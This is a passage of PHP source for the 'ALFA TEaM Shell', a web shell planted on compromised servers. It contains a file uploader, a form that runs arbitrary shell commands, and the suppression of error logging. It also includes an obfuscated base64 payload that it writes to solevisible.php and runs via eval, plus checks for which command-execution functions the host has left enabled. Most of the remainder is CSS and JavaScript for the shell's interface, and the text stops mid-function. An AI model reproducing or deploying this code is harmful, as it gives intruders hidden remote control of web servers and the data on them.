echo “<b style=’color: #7CFC00′>Server Ip Address is :  </font><font color=white>”.(function_exists(‘gethostbyname’)?@gethostbyname($_SERVER["HTTP_HOST"]):’???’).”</font><br><p>”;
echo ‘<hr><center><form onSubmit=”this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));” action=”” method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’;
echo ‘CWD: <input type=”text” name=”cwd” value=”‘.str_replace(“\\”,”/”,@getcwd()).’/” size=”59″><p><input type=”file” name=”file” size=”45″><input name=”upload” type=”submit” id=”_upl” value=”Upload”></p></form></center>’;
if(isset($_FILES['file'])){
if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).’/’.$_FILES['file']['name'])){echo ‘<b><font color=”#7CFC00″><center>Upload Successfully ;)</font></a><font color=”#7CFC00″></b><br><br></center>’; }
else{echo ‘<center><b><font color=”#7CFC00″>Upload failed :(</font></a><font color=”#7CFC0″></b></center><br><br>’; }
}
echo ‘<hr><form onSubmit=”this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));” method=”POST”>Execute Command: <input name=”command_solevisible” value=”” size=”59″ type=”text” align=”left” ><input name=”execute” value=”Execute” type=”submit”><br></form>
<hr><pre>’;
if(isset($_POST['command_solevisible'])){
if(strtolower(substr(PHP_OS,0,3))==”win”)$separator=’&’;else $separator=’;’;
$solevisible = “cd ‘”.addslashes(str_replace(“\\”,”/”,@getcwd())).”‘”.$separator.””.__ZGVjb2Rlcg($_POST['command_solevisible']);
echo alfaEx($solevisible);
}
echo’</pre>
</body></html>’;
exit;}
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set(‘error_log’,NULL);
@ini_set(‘log_errors’,0);
@ini_set(‘max_execution_time’,0);
@ini_set(‘magic_quotes_runtime’, 0);
@set_time_limit(0);
if(function_exists(‘set_magic_quotes_runtime’)){
@set_magic_quotes_runtime(0);
}
foreach($_POST as $key => $value){
if(is_array($_POST[$key])){
$i=0;
foreach($_POST[$key] as $f) {
$f = trim(str_replace(‘ ‘, ‘+’,$f));
$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
$i++;
}
}else{
$value = trim(str_replace(‘ ‘, ‘+’,$value));
$_POST[$key] = decrypt_post($value, _AlfaSecretKey());
}
}
$default_action = ‘FilesMan’;
$default_use_ajax = true;
$default_charset = ‘Windows-1251′;
if(strtolower(substr(PHP_OS,0,3))==”win”)
$GLOBALS['sys']=’win’;
else
$GLOBALS['sys']=’unix’;
$GLOBALS['home_cwd'] = @getcwd();
if($_POST["a"] != “GetPathHistory”){
if($_SESSION[__LAST_CWD__]!=$_POST['c']){
$_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
}
}
$GLOBALS["need_to_update_header"] = “false”;
if(isset($_POST['c'])){
if(!@chdir($_POST['c'])){
$GLOBALS['glob_chdir_false'] = true;
}
}
$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=”&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
if($GLOBALS['sys'] == ‘win’){
$GLOBALS['home_cwd'] = str_replace(“\\”, “/”, $GLOBALS['home_cwd']);
$GLOBALS['cwd'] = str_replace(“\\”, “/”, $GLOBALS['cwd']);
$_SESSION[__PATH_HISTORY__] = str_replace(“\\”, “/”, $_SESSION[__PATH_HISTORY__]);
}
if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != ‘/’ )$GLOBALS['cwd'] .= ‘/’;
function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
function alfahead(){
if(!function_exists(‘sys_get_temp_dir’)){function sys_get_temp_dir() {foreach (array(‘TMP’, ‘TEMP’, ‘TMPDIR’) as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], ”);if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
$GLOBALS['__ALFA_SHELL_CODE'] = ‘PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+’;
$alfa_uploader = ‘$x = base64_decode(“‘.$GLOBALS['__ALFA_SHELL_CODE'].’”);$solevisible = fopen(“solevisible.php”,”w”);fwrite($solevisible,$x);’;
define(“ALFA_UPLOADER”, “eval(base64_decode(‘”.__ZW5jb2Rlcg($alfa_uploader).”‘))”);
define(“ALFA_TEMPDIR”, (function_exists(“sys_get_temp_dir”) ? (@is_writable(str_replace(‘\\’,’/’,sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable(‘.’)?’.’:false)) : false));
if(!isset($_POST['ajax'])){
function Alfa_GetDisable_Function(){
$disfun = @ini_get(‘disable_functions’);
$afa = ‘<span class=”header_show_all”>All Functions Accessible</span>’;
if(empty($disfun))return($afa);
$s = explode(‘,’,$disfun);
$s = array_unique($s);
$i=0;
$b=0;
$func = array(‘system’,’exec’,’shell_exec’,’proc_open’,’popen’,’passthru’,’symlink’,’dl’);
$black_list = array();
$allow_list = array();
foreach($s as $d){
$d=trim($d);
if(empty($d)||!is_callable($d))continue;
if(!function_exists($d)){
if(in_array($d,$func)){
$dis .= $d.” | “;$b++;
$black_list[] = $d;
}else{
$allow_list[] = $d;
}
$i++;
}
}
if($i==0)return($afa);
if($i <= count($func)){
$all = array_values(array_merge($black_list, $allow_list));
return(‘<span class=”disable_functions”>’.implode(” | “, $all).’</span>’);
}
return(‘<span class=”disable_functions”>’.$dis.’</span><a href=javascript:void(0) onclick=”g(\’GetDisFunc\’,null,\’wp\’);”><span class=”header_show_all”>Show All (‘.$i.’)</span></a>’);
}
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo ‘<script>’;
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo ‘alfa’.$alfa.”_=”;
}
echo ‘””</script>’;
}
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
$freeSpace = function_exists(‘diskfreespace’)?@diskfreespace($GLOBALS['cwd']):’?’;
$totalSpace = function_exists(‘disk_total_space’)?@disk_total_space($GLOBALS['cwd']):’?’;
$totalSpace = $totalSpace?$totalSpace:1;
$on=”<span class=’header_on’> ON </span>”;
$of=”<span class=’header_off’> OFF </span>”;
$none=”<span class=’header_none’> NONE </span>”;
if(function_exists(‘ssh2_connect’))
$ssh2=$on;
else
$ssh2=$of;
if(function_exists(‘curl_version’))
$curl=$on;
else
$curl=$of;
if(function_exists(‘mysql_get_client_info’))
$mysql=$on;
else
$mysql=$of;
if(function_exists(‘mssql_connect’))
$mssql=$on;
else
$mssql=$of;
if(function_exists(‘pg_connect’))
$pg=$on;
else
$pg=$of;
if(function_exists(‘oci_connect’))
$or=$on;
else
$or=$of;
if(@ini_get(‘disable_functions’))
$disfun=@ini_get(‘disable_functions’);
else
$disfun=”All Functions Enable”;
if(@ini_get(‘safe_mode’))
$safe_modes=”<span class=’header_off’>ON</span>”;
else
$safe_modes=”<span class=’header_on’>OFF</span>”;
$cgi_shell=”<span class=’header_off’ id=’header_cgishell’>OFF</span>”;
if(@ini_get(‘open_basedir’)){
$basedir_data = @ini_get(‘open_basedir’);
if(strlen($basedir_data)>120){
$open_b=substr($basedir_data,0, 120).”…”;
}else{
$open_b = $basedir_data;
}
}else{$open_b=$none;}
if(@ini_get(‘safe_mode_exec_dir’))
$safe_exe=@ini_get(‘safe_mode_exec_dir’);
else
$safe_exe=$none;
if(@ini_get(‘safe_mode_include_dir’))
$safe_include=@ini_get(‘safe_mode_include_dir’);
else
$safe_include=$none;
if(!function_exists(‘posix_getegid’))
{
$user = function_exists(“get_current_user”)?@get_current_user():”????”;
$uid = function_exists(“getmyuid”)?@getmyuid():”????”;
$gid = function_exists(“getmygid”)?@getmygid():”????”;
$group = “?”;
}else{
$uid = function_exists(“posix_getpwuid”)&&function_exists(“posix_geteuid”)?@posix_getpwuid(posix_geteuid()):array(“name”=>”????”, “uid”=>”????”);
$gid = function_exists(“posix_getgrgid”)&&function_exists(“posix_getegid”)?@posix_getgrgid(posix_getegid()):array(“name”=>”????”, “gid”=>”????”);
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = ”;
$path = explode(“/”, $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= “<a class=’header_pwd’ href=’javascript:void(0);’ onclick=’g(\”FilesMan\”,\””;
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].’/’;
$cwd_links .= “\”)’>”.$path[$i].”/</a>”;
}
$drives = “”;
foreach(range(‘a’,’z’) as $drive)
if(@is_dir($drive.’:\\’))
$drives .= ‘<a href=”javascript:void(0);” class=”header_drive” onclick=”g(\’FilesMan\’,\”.$drive.’:/\’)”>[ '.$drive.' ]</a> ‘;
$csscode =’    -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;’;
echo ‘<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<meta name=”ROBOTS” content=”NOINDEX, NOFOLLOW” />
<link href=”‘.__showicon(‘alfamini’).’” rel=”icon” type=”image/x-icon”/>
<title>..:: ‘.$_SERVER['HTTP_HOST'].’ ~ ALFA TEaM Shell – v’.__ALFA_VERSION__.’ ::..</title>
<link href=”https://fonts.googleapis.com/css?family=Francois+One” rel=”stylesheet”>
<style type=”text/css”>
.hlabale {
color: #67ABDF;
border-radius: 4px;
border: 1px solid #27979B;
margin-left: 7px;
padding: 2px;
}
#tbl_sympphp tr {
text-align: center;
}
.editor-view {
position: relative;
}
.view-content {
position: absolute;
overflow-y: auto;
width: 100%;
height: 475px;
}
*::-webkit-scrollbar-track {
-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
border-radius: 10px;
background-color: #000115;
}
*::-webkit-scrollbar{
width: 10px;
background-color: #000115;
}
*::-webkit-scrollbar-thumb {
border-radius: 10px;
-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
background-color: rgb(30, 130, 181);
}
.editor-file-name {
margin-left: 29px;
margin-top: 4px;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.editor-icon {
position: absolute;
}
.is_active {
background: rgba(49, 55, 93, 0.77);
border-radius: 10px;
}
.history-list {
height: 88%;
overflow-y: auto;
}
#editor-minimized,#cgiloader-minimized {
display: block;
position: fixed;
right: -30px;
width: 30px;
height: 30px;
top: 30%;
}
.minimized-wrapper {
position: relative;
background: rgb(14, 48, 74);
width: 44px;
height: 167px;
cursor: pointer;
border-bottom-left-radius: 5px;
border-top-left-radius: 5px;
}
.minimized-text {
transform: rotate(-90deg);
color: wheat;
font-size: x-large;
display: inline-block;
position: absolute;
right: -51px;
width: 129px;
top: 50px;
border-top-left-radius: 4%;
height: 56px;
padding: 3px
}
.close-button,.editor-minimize {
height: 26px;
width: 38px;
right: 7px;
background: rgb(29, 86, 115);
cursor: pointer;
position: absolute;
box-sizing: border-box;
line-height: 50px;
display: inline-block;
top: 17px;
border-radius: 100px;
}
.editor-minimize {right: 50px;}
.close-button:before,.close-button:after,.editor-minimize:before {
transform: rotate(-45deg);
content: “”;
position: absolute;
top: 63%;
right: 6px;
margin-top: -5px;
margin-left: -25px;
display: block;
height: 4px;
width: 27px;
background-color: rgba(216, 207, 207, 0.75);
transition: all 0.25s ease-out;
}
.editor-minimize:before{
transform: rotate(0deg);
}
.close-button:after {
transform: rotate(-135deg);
}
.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
background-color: red;
}
.close-button:hover,.editor-minimize:hover{
background-color: rgba(39, 66, 80, 0.96);
}
#editor,#cgiloader {
display: none;
position: fixed;
top: 0;
width: 100%;
height: 100%;
}
.editor-wrapper {
width: 100%;
height: 100%;
position: relative;
top: 1%;
}
.editor-header {
width: 97%;
background: rgba(21, 66, 88, 0.93);
height: 37px;
margin-left: 13px;
position: relative;
border-top-left-radius: 15px;
border-top-right-radius: 15px;
}
.editor-path {
position: absolute;
font-size: x-large;
margin-left: 10px;
top: 6px;
color: springgreen;
}
.editor-modal {
position: relative;
top: 0;
background-color: rgba(0, 1, 23, 0.95);
height: 90%;
margin-left: 20%;
margin-right: 2%;
border: 2px #0e304a solid;
}
.editor-explorer {
width: 19%;
height: 90%;
background-color: rgba(0, 1, 23, 0.94);
position: absolute;
z-index: 2;
left: 1%;
border: 2px rgb(14, 48, 74) solid;
}
.editor-controller {
position: relative;
top: -13px;
}
.file-holder {
position: relative;
width: 100%;
height: 30px;
}
.file-holder > .history {
position: absolute;
color: rgb(3, 179, 163);
cursor: pointer;
left:5px;
font-size: 18px;
font-family: sans-serif;
width:89%;
height:100%;
z-index: 3;
border-radius: 10px;
transition: background-color 600ms ease-out;
}
.file-holder > .history-close {
display: block;
opacity: 0;
position: absolute;
right: 2px;
width: 20px;
top: 4px;
text-align: center;
cursor: pointer;
color: white;
background: red;
border-radius: 100px;
font-family: monospace;
z-index: 10;
transition: opacity 600ms ease-out;
font-size: 15px;
height: 19px;
}
.file-holder > .history:hover {
background-color: #646464;
}
.editor-explorer > .hheader {
position: relative;
color: rgb(20, 255, 7);
border-bottom: 2px rgb(32, 106, 162) solid;
text-align: center;
font-family: sans-serif;
margin-bottom: 10px;
height: 55px;
}
.editor-search {
position: absolute;
bottom: 7px;
left: 31px;
}
.hheader-text {
position: absolute;
left: 8px;
top: 2px;
}
.history-clear {
position: absolute;
right: 8px;
top: 2px;
cursor: pointer;
}
.editor-body {
position: relative;
margin-left: 3px;
}
.editor-anim-close {
‘.showAnimation(“editorClose”).’
}
@keyframes editorClose {
0% {
transform: scale(1);
opacity: 1;
}
100% {
transform: scale(0);
opacity: 0;
}
}
.editor-anim-minimize {
‘.showAnimation(“editorMinimize”).’
}
@keyframes editorMinimize {
0% {
right:0px;
opacity: 1;
}
100% {
right: -2000px;
opacity: 0;
}
}
.editor-anim-show {
‘.showAnimation(“editorShow”).’
}
@keyframes editorShow {
0% {
right:-2000px;
opacity: 0;
}
100% {
right: 0px;
opacity: 1;
}
}
.minimized-show {
‘.showAnimation(“minimizeShow”).’
}
@keyframes minimizeShow {
0% {
right: -30px;
opacity: 0;
}
100% {
right: 0px;
opacity: 1;
}
}
.minimized-hide {
‘.showAnimation(“minimizeHide”).’
}
@keyframes minimizeHide {
0% {
right: 0px;
opacity: 1;
}
100% {
right: -30px;
opacity: 0;
}
}
.solevisible-text:hover {
-webkit-text-shadow: 0px 0px 25px #00FF00;
-moz-text-shadow: 0px 0px 25px #00FF00;
-ms-text-shadow: 0px 0px 25px #00FF00;
text-shadow: 0px 0px 25px #00FF00;
}
.update-holder {
position: fixed;
top: 0;
background-color: rgba(0, 24, 29, 0.72);
width: 100%;
height: 100%;
}
.update-partner {
width: 50%;
position: relative;
border-radius: 31px;
height: 200px;
background-color: rgba(3, 3, 41, 0.47);
text-align: center;
color: rgba(252, 253, 251, 0.88);
margin-left: 25%;
top: 23%;
font-family: “Francois One”, sans-serif;
}
.update-partner:hover {
-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
}
.update-content {
position: relative;
}
.update-content > a {
text-decoration: none;
position: absolute;
color: rgba(103, 167, 47, 0.77);
left: 24%;
margin-top: 7%;
font-size: 40px;
font-family: “Francois One”, sans-serif;
}
.update-close {
position: absolute;
right: 0;
margin-right: 23px;
top: 10px;
font-size: 27px;
background-color: #130f50;
width: 5%;
border-radius: 100px;
cursor: pointer;
border: 2px rgb(14, 38, 90) solid;
}
.update-close:hover {
border: 2px #25ff00 solid;
color: #FF0000;
}
.filestools {
height: auto;
width: auto;
color: #67ABDF;
font-size: 12px;
font-family: Verdana,Geneva,sans-serif;
}
@-moz-document url-prefix() {
#search-input {
width: 173px;
}
.editor-path {
top:3px;
}
}
@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
#alfaloader{‘.$csscode.’width:100px;height:100px;}
#a_loader{‘.$csscode.’width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:”Comic Sans MS”;font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:’.alfa_getColor(“header_values”).’;font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:”Comic Sans MS”;font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:”Comic Sans MS”;font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:”Comic Sans MS”;color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url(‘.__showicon(‘alfamini’).’);background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:’.($GLOBALS['DB_NAME']['show_icons']==’1′?’0′:’1′).’px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:””;display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:””;background-color:#0E304A;background-image:url(‘.__showicon(‘alfamini’).’);background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url(‘.__showicon(‘btn’).’);background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;’.(!@is_writable($GLOBALS['cwd'])?’}.dir{background-color:red;}’:’}’).’
.main th{text-align:left;}
.main a{color: #FFF;}
.main tr:hover{background-color:#646464;}
.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:99%; height:300px; }
‘.alfaCssLoadColors().’
</style>’;
echo “<script type=’text/javascript’>
var c_ = ‘” . htmlspecialchars($GLOBALS['cwd']) . “‘;
var a_ = ‘” . htmlspecialchars(@$_POST['a']) .”‘
var charset_ = ‘” . htmlspecialchars(@$_POST['charset']) .”‘;
var alfa1_ = ‘” . ((strpos(@$_POST['alfa1'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) .”‘;
var alfa2_ = ‘” . ((strpos(@$_POST['alfa2'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) .”‘;
var alfa3_ = ‘” . ((strpos(@$_POST['alfa3'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) .”‘;
var alfa4_ = ‘” . ((strpos(@$_POST['alfa4'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) .”‘;
var alfa5_ = ‘” . ((strpos(@$_POST['alfa5'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) .”‘;
var alfa6_ = ‘” . ((strpos(@$_POST['alfa6'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) .”‘;
var alfa7_ = ‘” . ((strpos(@$_POST['alfa7'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) .”‘;
var alfa8_ = ‘” . ((strpos(@$_POST['alfa8'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) .”‘;
var alfa9_ = ‘” . ((strpos(@$_POST['alfa9'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) .”‘;
var alfa10_ = ‘” . ((strpos(@$_POST['alfa10'],”\n”)!==false)?”:htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) .”‘;
var d = document;
var mysql_cache = {};
var editor_files = {};
var editor_error = true;
var editor_current_file = ”;
var is_minimized = false;
var cgi_is_minimized = false;
var cgi_lang = ”;
var upcount = 1;
var islinux = “.($GLOBALS['sys']!=”win”?’true’:’false’).”;
var post_encryption_mode = “.(__ALFA_POST_ENCRYPTION__?’true’:’false’).”;
function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;”;
for($j=1;$j<=10;$j++){
